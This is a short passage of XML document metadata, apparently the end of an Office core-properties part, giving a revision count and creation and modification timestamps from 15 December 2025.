  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-15T06:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-15T08:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>